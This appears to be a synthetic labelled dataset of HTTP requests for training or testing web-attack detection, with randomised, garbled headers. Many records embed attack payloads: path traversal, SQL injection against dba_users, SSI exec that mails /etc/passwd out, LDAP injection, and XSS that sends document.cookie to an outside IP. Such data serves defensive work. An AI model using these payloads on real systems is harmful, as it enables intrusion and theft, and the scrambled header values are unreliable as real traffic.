Accept-Language: duZde-ht;q=0.2, 3eN4ru-i;q=0.3, Finnoiy-t3ee;q=0.9
Cache-Control: max-stale=2
Client-ip: 102.220.30.54
Cookie: rbxepnbztteeee=0hehmwriVe6aHi;jaajAeEl=9855173220;yehniun=s;InupdatekliZd1XeK=ro 1;gyne=hAh6Ssp;eat=3kt
Date: Fri, 29 Sep 06 01:39:37 UTC
Expect: 100-continue
From: e1ea@teeopdrn.uk
If-Unmodified-Since: Tue, 13 Apr 10 09:55:23 CET
If-Match: "IRdcB7tlKped9mNUh"
If-None-Match: "kdghtZWIRXRIPxNpWKB4"
Max-Forwards: 2
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: NTLM bmFiRXRsbmlnZXplYWxzTml1bWVlYWVyYWFzdHNkZDh4YTE0bmo=
Authorization: i3Ele gosEtzs0=hEese
Referer: http://awoedaw.st/Mpfs/dgc6oaa/beaAi/0ta7dc.cgi
TE: trailers,trailers
Trailer: Host
User-Agent: nlr5 (kwIAEt; leO16tUOIo; yKcqkiou4)
Via: 8.3 www.Agnadl.tiff
Warning: 550 140.13.48.198 "z9natieLeldihi1yr" 
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36017
Start - Id: 45674
class: PathTransversal
GET /aoa2eno/iq/lxnNn3uitSE/iK-@fKBC0NHvcxeR/sott59o7veatkItghi2i/Tyohvfjiimoofo6n9orh/0VSf9KwW1fromTQl/NI0/cdrdsl3swnroehae/A-zMC@zkBtK1Sb/ousrJpstdinu79echo_jP.png?5XA7N=6233&trhidlauat=d+nt&to=stnsyo4rny&tmetapO1Ewg=Af+%3Baandb&ET2QimgW-=u4nSzOQTN&nhhC=428&rbgdt=pedetsA&aiygndeikniHtfi=UlTrUay3l&onGcid@MU=37098071&-xTEj60zSZvR=fhcmdisorszjysmofo%299ue&hoeeog7fcn=7883&elm5am=0967&qGLenOensy=5111531867&tsSnkabdhtetA9i=hc52i&TeReaofnedo=%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fleerieontr%2Flisill%2Fli%2Fel.sh HTTP/1.0
Host: 100.9.122.205:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=63538
Client-ip: 10.24.0.201
Cookie: nlesN=nBhg;hmeesiol=epa;h1ine=pee0&oid8tYr;eew=hgpro9NY2.i;MTmYhthimvoseu=jno
Cookie2: $Version="401"
Date: Fri, 19 Nov 04 01:35:18 UTC
ETag: W/"GIZ.qU7cnYNpxU@"
Expect: 100-continue
From: nerbc@c9tot8nhs.cz
If-Modified-Since: Sun, 14 Mar 04 19:12:49 CET
If-Unmodified-Since: Mon, 27 Oct 08 02:40:37 UTC
If-Match: "hHkbkBmiYuc-XI.Frg"
If-None-Match: "cUIgVCA7eKWAFvfKX"
If-Range: Thu, 10 Jul 08 20:53:53 GMT
Max-Forwards: 64
MIME-Version: 4.5
Pragma: lpISjtf='e'
Proxy-Authorization: Digest cnonce="vhio"
Authorization: NTLM dHNjbmVkckVldHlyNHRsbWVhdDBoZGV3dG9jbnJhbGQ5ZWFub2UxRXRzc29IaXc=
Range: -368400,7896-37283
Referer: /9EsMin/6sjee7/RarIe/cpsua.gif
TE: trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/3.4 (compatible; Konqueror/1.0; Unix; rCfeoasscy; rhAe1ralqa; uniet0nc)
UA-CPU: StrongARM
UA-Disp: 6211,216,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 488x430
Via: FTP/7.1 240.186.209.6, FTP/5.9 www.teitf.tiff
Transfer-Encoding: 09ej
Upgrade: smhza/6.1, omsu/2.6, 8ysein/9.3
Warning: 534 45.179.228.107 "hsatu" 
X-Forwarded-For: 147.237.198.55
X-Serial-Number: 1618317
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 45674
Start - Id: 42509
class: SqlInjection
GET /ep/E1nph-Ofhz/sHaSGJ2AxLxa.opmlr.js?Wegp=a&ra7=vhegWunionh&rzWv=7fqlnce&2lOocnal=4699522&sw1Htnz3=9&boot.iniKHwbiUmail3WPp=chairs%27+++UNION+++SELECT+rairo+++++FROM+++++dba_users+++WHERE+++++name+++++like+++%27%2525&vrtshdniktheae=teaainserttmea%5Clt&lrlriucse=h3iN4DhWLTHE&aea76den=aEiaAnHrsatglh&Mat1=18&y5luwo99oqsa=8&pgxn=alKGbIBOhew%40&bYVltQNall0a9Qy=98910653 HTTP/1.1
Host: 199.46.196.9
Connection: tpgttrn
Accept: */*
Accept-Charset: koi8;q=0.0, euc-tw;q=0.8, x-mac-hebrew, windows-1255, utf-7
Accept-Encoding: 
Accept-Language: 6eiRhotc-bgrtm;q=0.9
Cache-Control: no-cache
Client-ip: 17.1.105.246
Cookie: 5teh=essz;uRdy4tc=wncehtneiijr;jaan6pccDtaegi=8158875755
Cookie2: $Version="48"
Date: Wed, 28 May 08 24:22:58 CET
ETag: "Fhdp4@cKxDHrUkZvfQ"
Expect: 100-continue
From: be38Ged@6e9snto.ch
If-Modified-Since: Mon, 25 Jan 10 08:58:37 GMT
If-Unmodified-Since: Mon, 11 Jul 05 13:38:44 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 24 Feb 04 01:49:49 UTC
Max-Forwards: 7730
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: Basic d2xpbjplbmsxaHk2bQ==
Authorization: wihthE ohi5e2s=ysr5dz
Range: 16802-
Referer: http://orlljl3.st/nu76.txt
TE: gzip;q=0.7,trailers
Trailer: Max-Forwards
User-Agent: uaaieua/8.1
UA-CPU: x86
UA-Disp: 3013,748,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 8264x986
Via: HTTP/3.4 91.221.152.198
Transfer-Encoding: gzip
Upgrade: ihs/6.9, sw1v/7.0, tkg/8.2, rtlu/7.8, heTt/3.6
Warning: 504 127.15.72.187:71097 "tehsu6o03" "Sat, 20 Aug 05 24:15:38 GMT"
X-Forwarded-For: 10.31.99.179
X-Serial-Number: 171208894897748
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42509
Start - Id: 40104
class: SSI
GET /3ophneoErinieNrs/suEr0AouNbeR1@/trNKhCnHV4gZte/mhuu/i6wPn1-qrb7e/uhrfeeoruo2eshuwki.shtml?EoperlJ35a=%3C%21--++%23exec+++++cmd%3D%22%2Fbin%2Fmail+Apoa.com+++++%3C+++++%2Fetc%2Fpasswd%22--%3E&votaoksmmnlsl3=andLalltnxterm&net=3884&minr63i=cefRnyoRhmwehtsone&oi=4520113&9taabsnoff=76821&earNndegol=dmwl&l1bmtm=vbscriptt&6XMq4.Xt=%5Ca++ HTTP/1.0
Host: www.ecrTei0h.st:80
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=5024
Client-ip: 113.207.135.168
Cookie: idwOvyoxhT=n
Cookie2: $Version="674"
Date: Mon, 19 Nov 07 12:21:51 GMT
ETag: W/"aBKdxlbr.ECzHxyEdr"
Expect: 100-continue
From: ihPoede@2hepettfu.be
If-Modified-Since: Mon, 06 Aug 07 24:54:10 GMT
If-Unmodified-Since: Thu, 17 Nov 05 07:52:05 GMT
If-Match: *
If-None-Match: "IJUegcLkv1mshta7hsOH"
If-Range: Mon, 10 Jan 05 02:28:29 UTC
Max-Forwards: 8035
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Basic bXQzVHI6aWFkaWNJbA==
Authorization: NTLM Y0NlbGl0cm9naGdyMEV1MUplMXdkZXVyNkV6ZG90dEF4bnlxVWV5ZVFpYUZo
Range: 12545-4
Referer: /Irthet4/hfta/refo.html
TE: deflate
Trailer: Proxy-Authorization
User-Agent: Mozilla/4.5 (X11; U; Open BSD i386 3.2; te-ra; rv:4.3.9) Gecko/99552995
UA-CPU: 68000
UA-Disp: 952,4343,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 192x9251
Via: la2u/1.6 www.rfprsI.jpg
Transfer-Encoding: compress
Upgrade: uts3/8.2, hd4uvh/2.4, a6sol/2.3, yce/9.7, cnsH/1.9
Warning: 875 www.mevs.jpg "9uMt5m0detdesdfons" 
X-Forwarded-For: 241.68.225.159
X-Serial-Number: 606454137105
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40104
Start - Id: 40794
class: SSI
GET /l1hq5yltsdtHmiCuc/w8potc/5oa/dDwHXcn/eF_zS0x9DwqeJIT5Pf.php4?-LCysfKUBuBy=986102&Y_V4G@ao21=%3C%21--+%23odbc++++connect%3D%22wE%2CaowRr%2Cdcisg%22++++++statement%3D%22select++++*++from++stotR%22--%3E&srec=dft2WoZZ&ehcrdns29stra=tqt&WVrNidFTrPXoc=lfRy2 HTTP/1.0
Host: 121.236.195.65:16957
Connection: close
Accept: text/html;q=0.9, audio/*;q=0.8
Accept-Charset: iso-2022-kr, x-mac-ce;q=0.8
Accept-Encoding: gzip;q=0.9
Accept-Language: *;q=0.4
Cache-Control: min-fresh=9
Client-ip: 187.102.187.0
Cookie: csve3AAqtP9s=7;saHok=648
Cookie2: $Version="99"
Date: Sat, 05 Feb 05 16:19:46 UTC
ETag: "Mkc9ZM08CabKyv1n"
Expect: nsirg=5AerheO;iropdi=icem1yli
From: iiljwdi@httr81j.de
If-Modified-Since: Tue, 13 Dec 05 11:26:01 CET
If-Unmodified-Since: Thu, 15 Jan 09 09:23:19 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 2.9
Pragma: nnletWa='td2ea'
Proxy-Authorization: Digest username="easT"
Authorization: NTLM Y2lsZW1yb2lpckF0ZWFFUG9FMTY3ZVJkbmk0dGRpYWlkenBzcHJwa3JsYW5l
Range: -473515,10127-9,-129281
Referer: /cRtNht/iUnWmtgt/2snFad/i9Gae93.nsf
TE: chunked;q=0.7
Trailer: Authorization
User-Agent: Mozilla/0.6 (Windows; U; Win 9x 6.7; dn-ip; rv:0.3.3) Gecko/15405452
UA-CPU: 68000
UA-Disp: 5062,338,8
UA-OS: Win98
UA-Pixels: 4833x5333
Via: 4.9 28.139.46.148, HTTP/5.9 254.140.222.244, 9.6 www.nhedl.shtml
Transfer-Encoding: HtRp; esaeps=i2ta2re
Upgrade: hfheyu/3.0, aae/3.8, rsayt/5.1, moh1r/4.2, ryonhi/6.6
Warning: 512 www.zgaaa4Nn.html "tnlssOrNs" 
X-Serial-Number: 095022921
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40794
Start - Id: 37552
class: LdapInjection
POST /rnnatceedhz/daah/emaqtri/uULlHvxgskY/ol-nKEtJxTrsDqwl/h9naghrevre5cia.swf? HTTP/1.1
Content-Length: 84
Content-Language: ee,sxbd
Content-Encoding: identity
Content-Location: http://dqor.uk/sn9lans/npoy/dltetoz0/upreeth/nteelp.sh
Content-MD5: ZGVuOWNMdHFkbURhOXJFbg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 29 Aug 08 04:54:33 UTC
Last-Modified: Tue, 12 May 09 17:18:04 CET
Host: 37.169.213.134:80
Connection: close
Accept: */*
Accept-Charset: utf-7;q=0.7
Accept-Encoding: identity, identity;q=0.5, identity;q=0.8, identity;q=0.8
Accept-Language: e-ti2s;q=0.2
Cache-Control: min-fresh=30544
Client-ip: 115.143.65.85
Cookie: oinnwnomunes=icSz;zEer1ue=ouqtqes1TT95s;mpHe=cVYYAZrwfYF7
Cookie2: $Version="00"
Date: Thu, 01 May 08 23:00:29 GMT
ETag: "DKMeyFEGPC-DDbSpr"
Expect: ontekast
From: oenu@5hnawusete.de
If-Modified-Since: Fri, 03 Oct 08 21:29:41 CET
If-Unmodified-Since: Tue, 09 Nov 04 03:04:38 UTC
If-Match: "5HrHWNqt-vzBcgI8"
If-None-Match: "YP@y.S8NX6iOlAIr0"
If-Range: *
Max-Forwards: 38
MIME-Version: 7.0
Pragma: 3=htyeiftm
Proxy-Authorization: NTLM ZXBuZWRpbWcxdGNsSWFvSW9UbmVlcmQ4YWFOdGh1YzdwZW5PdWNlbnJlbw==
Authorization: NTLM emxsb2Rhc3FjOWVuZHRiZGp0eVNpdHlzZGUxc2k0c3JSaW8wZXc=
Range: -78728,9752-,0169-21
Referer: http://loxh.com/l7ehdln/ue4jer/pe4p/ybvu4v/fpbIMer.gif
TE: deflate;q=0.9,trailers,deflate
Trailer: If-Unmodified-Since
User-Agent: Mozilla/1.7 (Machintosh; U; PPC 3.9; sk-1z; rv:1.0.7) Gecko/12074855
UA-CPU: MIPS
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 1680x065
Via: 1.8 www.onghl.css, HTTP/1.2 166.43.121.185:7212, ecow/7.3 217.120.123.13
Transfer-Encoding: compress
Upgrade: Uzteet/0.5, dhot7e/3.9, dtjlO/6.3, Whr/7.3, r5he/4.5
Warning: 384 59.186.228.229 "atuGyeetiitsHF" 
X-Serial-Number: 01594707388200191754
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1phoDeettakdvk=l&7e7lmdaj=nttec9ise1&9otlyya=2306&tTi=iGde)(    |(aor=*)

End - Id: 37552
Start - Id: 39080
class: LdapInjection
PUT /uW6bAISAW_@uUyxgg/mkllepeldyxeA/ra/lf/clv2ii/nfesa.tiff? HTTP/1.1
Content-Length: 55
Content-Language: alpgufiy
Content-Encoding: gzip
Content-Location: http://yEmgp9ea.st/odthc.txt
Content-MD5: c2Ruc250MWN1c3M4bHRlYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 01 Aug 05 01:15:46 GMT
Last-Modified: Mon, 19 Jul 04 01:49:46 UTC
Host: www.iyju2tyqce.org
Connection: keep-alive
Accept: text/*;q=0.6, application/postscript
Accept-Charset: iso-8859-15;q=0.2, iso-8859-15;q=0.5
Accept-Encoding: *
Accept-Language: baktmTn-t9l3Oy6h, gltat-oeet95ne, Rttbitn-eOlixmnx, yetn-snltehdu
Cache-Control: min-fresh=8769
Client-ip: 120.65.51.179
Cookie: iusphjznmNts=48491867;ei=oe)(   |   (fnfn=*);0xD5oN9sBPre=lsteo;mndapeu7edya2ls=dnimy9e&ai;nzv@pwTDqKxD= ;sdai4lsy=is
Cookie2: $Version="9"
Date: Sat, 07 Feb 04 12:55:44 CET
ETag: W/"wkDh0w5SbBFUywh1dP1"
Expect: peeuadwe
From: hhsos2Jt@Dpotzngl.gov
If-Modified-Since: Sun, 14 Dec 08 22:27:59 GMT
If-Unmodified-Since: Mon, 21 Mar 05 08:59:57 CET
If-Match: *
If-None-Match: "eWGL948@f0pJ0Gr0P"
If-Range: "9qlrMN9ci8xOfFw0V24O"
Max-Forwards: 5
MIME-Version: 1.2
Pragma: aTm67zn='0Ibbe'
Authorization: Basic bkgwYzpsczEz
Referer: /hnrie3/ec1nm/rs1tyT/ndnothJd/nduoea.mpg
TE: trailers
User-Agent: Mozilla/8.1 (Machintosh; U; PPC 2.5; Gr-w1; rv:5.6.9) Gecko/08979653
UA-Color: color16
UA-Pixels: 9422x4154
Via: tee/1.4 147.58.222.26, 1.4 www.ee2N.gif:88, 7.6 172.47.193.177
Transfer-Encoding: l3de; bhrsRte=qbtl5sLt
Upgrade: rishh/8.4, OnisdI/5.4, Tcuko/3.4, opdaet/0.0
Warning: 529 www.iaEnlc.shtml "HhusNdbemwiiMof7rg" 
X-Forwarded-For: 22.168.245.53
X-Serial-Number: 89933441893
----: ----------------
~~~~~: ~~~~~~~~~~

GmuO=i)lziitENHitnOu&4iUog=21008&VcnW4CqQ5=nfeatartsl

End - Id: 39080
Start - Id: 46507
class: XSS
GET cgiwrap/<SCRIPT>alert(document.domain)</SCRIPT>? HTTP/1.1
Host: www.eoehrfnoeh.ch
Connection: close
Accept: application/*
Accept-Charset: x-mac-hebrew;q=0.0, iso-8859-2, iso-10646-ucs-2;q=0.5
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 214.228.199.146
Cookie: txse=mwisoeEasoets;ymcteevtn=rdit0)ajevaltteiRT8tio;uioeq9raRsieh=2162157
Cookie2: $Version="761"
Date: Fri, 29 May 09 16:31:58 GMT
ETag: W/"CdcL9D22QKTslk5h3r"
Expect: TyeArn
From: csa3iee@teat.com
If-Modified-Since: Thu, 30 Apr 09 09:54:53 CET
If-Unmodified-Since: Fri, 30 Apr 04 15:21:31 GMT
If-Match: *
If-None-Match: *
If-Range: "4Arrm0d@fEkZnnw"
Max-Forwards: 9
MIME-Version: 0.6
Pragma: egaet=ep
Proxy-Authorization: Basic aG1hZWVwNzpZYXNvbzU3cg==
Authorization: uflam edBtl=heEet
Range: 8817-695585,1-
Referer: http://lodovA.de/tr4wl5uI.mspx
TE: trailers,chunked;q=0.1
Trailer: Pragma
User-Agent: opY3h3Y http://www.eeeoyh.cz
UA-CPU: x86
UA-Disp: 0683,5714,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 139x000
Via: FTP/6.1 236.209.231.19
Transfer-Encoding: gzip
Upgrade: lNa/8.0, nnchdy/2.1, q9de/3.4, se9N7o/1.4
Warning: 270 www.Taaaeh.shtml "aOxgliirnstyeOIeo6rn" 
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46507
Start - Id: 40602
class: SSI
GET /okeJhF3Aq1b0@wVs.png?g.b5pwindow.opennw=7&lmxeeeftnjfsn9=%3C%21--+++++%23include+++++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22++--%3E&snoc=0997&dawzTniniT0y=3bcomm1kr65w&elajhdia=808&oljoWjebitEB=un&hPFwhere=Etv HTTP/1.1
Host: 193.167.17.118
Connection: close
Accept: video/quicktime;q=0.2, image/gif;q=0.4, text/*;q=0.9
Accept-Charset: euc-kr, hz-gb-2312, windows-1254;q=0.9
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 134.30.107.102
Cookie: eeet4pq=5QoAT2lFG;jdeletesfUe=aastynoG;js=qoehr;ccenha=8
Cookie2: $Version="0"
Date: Tue, 31 Aug 04 14:13:06 CET
ETag: W/"WW71N8tHho3K3sd@"
Expect: 100-continue
From: nahti@Onishessl.uk
If-Modified-Since: Wed, 01 Jul 09 03:49:32 UTC
If-Unmodified-Since: Thu, 11 Mar 10 18:07:43 UTC
If-Match: "KSXX4-Ok5MEMI62n3hm"
If-None-Match: *
If-Range: "Ld-s.-@Mr4bpfYks-PmF"
Max-Forwards: 5600
MIME-Version: 8.9
Pragma: eoaoasf=ebrelYNt
Proxy-Authorization: Digest algorithm=ekoie
Authorization: sx193t H0ees=scnstih
Range: -7,-7178,-26215
Referer: /coso/tt1se/5ratg/rsaal4ir.jsp
TE: chunked;q=0.0,deflate,gzip
Trailer: Warning
User-Agent: tutYRlWgc http://www.3awSrinn.org
UA-CPU: PowerPC
UA-Disp: 953,006,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 7337x662
Via: HTTP/0.2 6.234.80.14
Transfer-Encoding: compress
Upgrade: awe/2.0, seeicn/1.1, irwd1t/6.6
Warning: 740 www.iawi.png:527 "cErneOeniy5Rfoed" 
X-Forwarded-For: 142.48.24.138
X-Serial-Number: 55192
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40602
Start - Id: 36125
class: PathTransversal
GET /oeeehulei/ppW5-J-SnU6B98/1wlrMNNIEI@Ge.dll?rorDnvtgc=cczS7mi-4K9J&tose=nvhehjnmgeaacMl&3kZPDKbxF7=etrcacuiaEaAy&aiwzuqa=qfa&ctosrwhohum=rMABmHLXQAO&tnieee6tatt3E=cO%28&hht1ei=tmpl&v@eKYc4window.openjtV=nmhaDsoomqhbq&Dp.RZwR=..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&gq8mZZtVnE=efnnarscsjtR&o55etae=rLehe4hdr HTTP/1.0
Host: 119.247.212.36:66051
Connection: keep-alive
Accept: text/*
Accept-Charset: x-mac-chinesetrad;q=0.4, us-ascii
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: min-fresh=5106
Client-ip: 107.18.136.170
Cookie: Pl6n7aEP8=null%r7aitafoxu;pnoe=dawchsltvps zr
Cookie2: $Version="5"
Date: Mon, 14 Apr 08 02:26:48 GMT
ETag: "O@wdOljLOEMWn41hVasM"
Expect: ltosnt
From: dzgo@mzeta.ch
If-Modified-Since: Wed, 27 Jun 07 12:01:14 UTC
If-Unmodified-Since: Fri, 05 Jun 09 11:01:55 CET
If-Match: "b5e7vsLGQtX1LeaFOqP"
If-None-Match: "0DaHq-f_qTdCAPg"
If-Range: "VKsM3rQokwRGUG5V"
Max-Forwards: 7376
MIME-Version: 7.2
Pragma: t=c
Proxy-Authorization: NTLM aWVhbTh3ZWFleGRmaGd0cm5VMHN0ZXh2M2lnb05qdGVoZWhzdQ==
Authorization: sneew wtipeu1=scttED
Range: -549293,-6
Referer: /iAimt.txt
TE: chunked
Trailer: Proxy-Authorization
User-Agent: Mozilla/2.1 (Windows; U; Win98 2.2; rg-e7; rv:1.7.8) Gecko/00063026
UA-CPU: MIPS
UA-Disp: 0150,960,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 7606x3250
Via: HTTP/9.7 www.rEzn.gif
Transfer-Encoding: identity
Upgrade: qsat/1.5, cnarW/6.7
Warning: 482 65.238.5.101 "ois0cbedlccylrNmtRrg" "Sun, 04 Jun 06 04:15:57 GMT"
X-Forwarded-For: 62.96.238.58
X-Serial-Number: 15784658
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36125
Start - Id: 46745
class: XSS
GET /ofJsVQy/aKBCe7_WcgQ8HlpL/ucSsewa/mndU/c_2Gk0N/eNZQzwDLTd-QF7.b6t/xVX.gaHkLm/aD.tiff?XpositionkcI9vsrmZt=I&tinsgehtoosoie=rpotimihenetcat4smochayoiu%25m&sbaocvonh=aAyLQD&qeare=qeoNMre2ewrd09Bys&ea=54226&rDwtT8reobno0x=IsishAglad&ztZpzNphc6k=a7oisesW&Iee=%5Di&amot2sPiybmtrg=Tna&1zTa6tAtoadOd1=WsIHo1hha0on&tLh6eao=%3Fchuo&eisc4o=0h5thttp&itdrcd60m=n%7Ehmetbv+si HTTP/1.1
Host: www.knror.org
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-roman, windows-1257;q=0.9, iso-8859-6;q=0.9, iso-8859-3, windows-1251;q=0.3
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: ot7aedq='yeq'
Client-ip: 121.249.163.105
Cookie: o4= Nch;seasheGreeo=<form+name=eIlr    ><select+name=ee  >http://www.fh7n.com/i/?</select   ></form   >
Cookie2: $Version="82"
Date: Sun, 13 Jan 08 04:34:23 UTC
ETag: "xiubSN87eRtmmb1OGP7"
Expect: heamhttb
From: scasu@Elrtai.net
If-Modified-Since: Tue, 20 Mar 07 15:15:08 UTC
If-Unmodified-Since: Thu, 30 Jul 09 17:02:34 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 425
Pragma: issafue4='iutetum'
Proxy-Authorization: psatf diliexbX=thhwo4s
Authorization: NTLM ZXRvZWVibHluaU84aXRuaW1pZnNjZWRhZWhod2llSWF5aG1Ucm8=
Referer: /otlty/qoioaj/i1rht.gif
TE: trailers
User-Agent: Mozilla/2.2 (X11; U; Linux i386 3.6; um-sn; rv:9.7.1) Gecko/08362897
Via: 7.8 www.istwL.gif:31333, FTP/4.8 www.teiosl.css:44939
Transfer-Encoding: identity
Upgrade: wnSS/4.9, tdirLs/1.1, ri6m/6.4, ddhoIa/1.2
Warning: 305 www.me7rIe.js "dee5aniAheserk9leoct" 
X-Forwarded-For: 54.166.146.233
X-Serial-Number: 96669417023
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46745
Start - Id: 40955
class: SSI
PUT /28QmSJ_/VCbqTd9yGnetcatjI/3v9/joentrroTrnTqoyeav/Yjfcysyea/lKK/tIoG.A63hG/a-tOM9wLuieh-_4ycj/pA4othpo/i3eYxYzWI.jpeg? HTTP/1.0
Content-Length: 160
Content-Language: wdto
Content-Encoding: compress
Content-Location: /dIlu/Hsevdo/d0eg8oO.wmn
Content-MD5: bm5pbzBlYVRsSEUyYjVpZQ==
Content-Type: application/x-www-form-urlencoded
Host: 186.171.94.40
Connection: tieia0in
Accept: */*;q=0.2
Accept-Charset: iso-8859-8;q=0.5
Accept-Encoding: 
Accept-Language: Cbc-E6;q=0.2
Client-ip: 164.128.152.74
Cookie: cbrpSmakgies=eah rno6iwaocet
Cookie2: $Version="799"
Date: Sun, 11 Jul 04 06:41:48 CET
If-Unmodified-Since: Fri, 09 Oct 09 15:17:58 UTC
If-Match: "Kj7gA0Z_uyAF2BprI"
If-None-Match: "EXaEie4st8PgI-Gd"
If-Range: Fri, 29 Aug 08 21:18:59 CET
Max-Forwards: 7
MIME-Version: 0.9
Pragma: mUtuJic='t'
Proxy-Authorization: Basic aW5pZDpzdGtuYw==
Authorization: oa0or mmrsne=lnoiioke
Referer: /cabn/9s230p.js
TE: chunked;q=0.3
User-Agent: <!-- #odbc    statement=   "select  ntewH,   neh,     zyoahmse  from a1ib4Emoc  order  by 3,   678,  4"   -->
UA-Color: color32
Transfer-Encoding: compress
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

eDabasm0y=235524914&8vganadxs5i8i=oyoeilntse06c5etf&atq_0aPSselectW=333391246&ns9eh=3&nder0aelijljtz=osJpn9&mit1aterntLrrg=14014&EZlByrw=7665&e7ifa8toemals7=eoo

End - Id: 40955
Start - Id: 47771
class: XSS
GET /nihhjsjetnAaet7a/s0k_7QQT7U2wlo_bMQV/cgmVJ/kHdhlo8D@rcfrT/dHAr95tJz5wgm/tmoa4nx/Btuchchild@Frum2GA.asp?20iui=%3Cimg+++++src%3D%26%7B%5Bwindow.open%28%27http%3A%2F%2F167.95.79.206%2Flldeti.cgi%27%2Bdocument.cookie%29%3B%5D%7D%3B%3E&vi1xIkFf=409392698 HTTP/1.1
Host: www.xkn4sc.biz
Connection: close
Accept: application/rtf, image/*;q=0.0
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.3
Accept-Language: gnsks-7;q=0.3, 5vokxmd-92e4, iAe-Pa;q=0.0
Cache-Control: no-store
Client-ip: 91.90.227.252
Cookie: 2elc=dcw
Cookie2: $Version="49"
Date: Mon, 15 May 06 05:14:00 CET
ETag: "q@9vcjf95.j6GZXaYbP"
Expect: nhsE=jgeiwe
From: ychumrg@eeAsehi.cz
If-Modified-Since: Mon, 17 Nov 08 16:47:17 UTC
If-Unmodified-Since: Sat, 23 Sep 06 21:11:43 UTC
If-Match: "58voER346VsT_GDZiHbx"
If-None-Match: "_LTYl-8m2v@24aemBkx"
If-Range: Wed, 22 Oct 08 02:04:11 CET
Max-Forwards: 67
MIME-Version: 3.5
Pragma: g8=h0T
Proxy-Authorization: Basic aHZpbmVkaTpodGFzbw==
Authorization: asgu eNir55I=ndip
Range: 2672-661117
Referer: http://jta5.org/5tta.jsp
TE: chunked,deflate;q=0.4,deflate
Trailer: Transfer-Encoding
User-Agent: otbf4AtSesTto
UA-CPU: 68000
UA-Disp: 1153,3781,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2539x540
Via: 7.2 207.14.74.135:97267, 9.7 www.2NslS.htm:551, 2.4 www.tatmu.tiff
Transfer-Encoding: identity
Upgrade: ioe/1.5, oaei/8.3, ehtv/0.6
Warning: 631 www.kssI.html "8aanadrIs23e" "Sun, 29 Oct 06 08:10:03 UTC"
X-Forwarded-For: 208.82.57.120
X-Serial-Number: 47690533150312984482
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47771
Start - Id: 45213
class: PathTransversal
GET ////? HTTP/1.0
Host: 175.96.53.104
Connection: close
Accept: text/*, application/*
Accept-Charset: *;q=0.4
Accept-Encoding: identity, identity, identity;q=0.7
Accept-Language: *
Cache-Control: max-stale
Client-ip: 115.213.88.73
Cookie: m4ZJ=08156;sutgAsgrb10a=isdUegs;sskiaih=46;seh1=ba%Saeitp9OeZR;9uiyleeroFa=octehea0dactaow;svltwna=17747
Cookie2: $Version="5"
Date: Wed, 11 Jan 06 08:03:13 CET
ETag: W/"_42@pBjVbX4bYLjRIkl"
Expect: EEer
From: 1p4rry@estl2a.org
If-Modified-Since: Tue, 21 Feb 06 05:39:31 UTC
If-Unmodified-Since: Thu, 09 Mar 06 19:57:03 GMT
If-Match: "l.vX.hJEasDfI8kBDA"
If-None-Match: "ql1LzEgDmoYabfZ.U"
If-Range: Fri, 07 Sep 07 22:02:20 CET
Max-Forwards: 5188
MIME-Version: 3.6
Pragma: dicabtb='acqng8'
Proxy-Authorization: Naeer5 notae=eonhimtj
Authorization: NTLM b2VkTGlueWVDV29hckVFYW5oMmV1OTFhdGRjYVJwZVNhYmVqNGF1ZQ==
Range: 223066-,90-340647
Referer: /9rssbfr/o9us/a6twsoce/o91o/celqctel.css
TE: trailers
Trailer: Expect
User-Agent: Mozilla/4.9 (compatible; Konqueror/2.1; Win 9x; htenyels)
UA-CPU: 68000
UA-Disp: 675,5988,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 487x2717
